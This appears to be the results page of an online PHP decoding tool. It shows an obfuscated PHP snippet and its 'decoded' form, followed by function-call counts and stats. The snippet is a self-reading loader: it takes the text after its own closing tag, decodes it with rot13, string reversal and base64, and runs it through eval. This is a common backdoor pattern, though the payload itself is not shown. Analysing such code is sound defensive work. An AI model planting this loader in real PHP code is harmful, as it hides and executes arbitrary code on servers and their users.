Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $L66Rgr=explode(base64_decode("Pz4="),file_get_contents(__FILE__)); $L6CRgr=array(..

Decoded Output download

<?php 
$L66Rgr=explode(base64_decode("Pz4="),file_get_contents(__FILE__)); 
$L6CRgr=array(base64_decode("L3gvaQ=="),base64_decode("eA=="),base64_decode(strrev(str_rot13($L66Rgr[1])))); 
$L7CRgr = "3891f12487cfe44b381e642625df0e2a"; 
preg_replace($L6CRgr[0],serialize(eval($L6CRgr[2])),$L6CRgr[1]);exit();?>

Did this file decode correctly?

Original Code

<?php
$L66Rgr=explode(base64_decode("Pz4="),file_get_contents(__FILE__));
$L6CRgr=array(base64_decode("L3gvaQ=="),base64_decode("eA=="),base64_decode(strrev(str_rot13($L66Rgr[1]))));
$L7CRgr = "3891f12487cfe44b381e642625df0e2a";
preg_replace($L6CRgr[0],serialize(eval($L6CRgr[2])),$L6CRgr[1]);exit();?>

Function Calls

explode 1
base64_decode 3
file_get_contents 1

Variables

$L66Rgr None

Stats

MD5 1ceab5ff6031cb0adeec7b332da7bad2
Eval Count 0
Decode Time 69 ms